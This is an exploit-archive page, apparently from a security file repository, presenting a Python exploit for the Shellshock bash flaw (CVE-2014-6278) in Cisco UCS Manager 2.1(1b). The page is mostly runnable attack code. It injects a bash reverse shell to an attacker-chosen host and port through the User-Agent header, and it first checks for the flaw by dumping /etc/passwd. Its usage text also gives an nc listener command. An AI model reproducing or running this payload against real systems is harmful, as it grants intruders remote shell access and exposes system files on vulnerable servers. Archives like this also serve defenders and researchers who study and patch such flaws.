Cisco UCS Manager 2.1(1b) Shellshock

Cisco UCS Manager 2.1(1b) Shellshock: Posted Mar 17, 2016; Authored by thatchriseckert; Cisco UCS Manager version 2.1(1b) shellshock exploit that spawns a connect-back shell.; tags | exploit, shell; systems | cisco; advisories | CVE-2014-6278; SHA-256 | 8e555e4314339995e576394135e468491a5591e41f42cc88f61d026cdbae0718; Download | Favorite | View

Cisco UCS Manager 2.1(1b) Shellshock

#!/usr/bin/python
###############################################
# Cisco UCS Manager 2.1(1b) Shellshock Exploit
# 
# CVE-2014-6278
# Confirmed on version 2.1(1b), but more are likely vulnerable.
# Cisco's advisory: 
# https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
# Exploit generates a reverse shell to a nc listener.
# Exploit Author: @thatchriseckert
###############################################
 
import sys
import requests
import time
  
if len(sys.argv) < 4:
    print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit"
    print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>"
    print "[*]"
    print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444"
    print "[*] Listener: nc -lvp <port>"
    print "\n"
    sys.exit()
 
#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings() 
ucs = sys.argv[1]
url = "https://" + ucs + "/ucsm/isSamInstalled.cgi"
attackhost = sys.argv[2]
revshellport = sys.argv[3]
headers1 = {
        'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1'
        }
headers2 = {
        "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)'
        }
 
def exploit():
    try:
        r = requests.get(url, headers=headers1, verify=False, timeout=5)
    except Exception, e:
        if 'timeout' in str(e):
            print "[+] Success.  Enjoy your shell..."
        else:
            print "[-] Something is wrong..."
            print "[-] Error: " + str(e)
 
def main():
    try:
        r = requests.get(url, headers=headers2, verify=False, timeout=3)
        if r.content.startswith('\nroot:'):
            print "[+] Host is vulnerable, spawning shell..."
            time.sleep(3)
            exploit()
        else:
            print "[-] Host is not vulnerable, quitting..."
            sys.exit()
    except Exception, e:
        print "[-] Something is wrong..."
        print "[-] Error: " + str(e)
 
if __name__ == "__main__":
    main()

Top Authors In Last 30 Days

Red Hat 263 files
indoushka 178 files
Ubuntu 96 files
Gentoo 32 files
Debian 20 files
Apple 11 files
LiquidWorm 10 files
malvuln 8 files
Rubén López Herrera 5 files
Google Security Research 5 files

File Archives

Systems

AIX (430)
Apple (2,117)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,137)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (391)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,486)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,995)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,903)
UNIX (9,466)
UnixWare (188)
Windows (6,783)
Other

Cisco UCS Manager 2.1(1b) Shellshock

Cisco UCS Manager 2.1(1b) Shellshock

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Cisco UCS Manager 2.1(1b) Shellshock

Share This

Cisco UCS Manager 2.1(1b) Shellshock

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems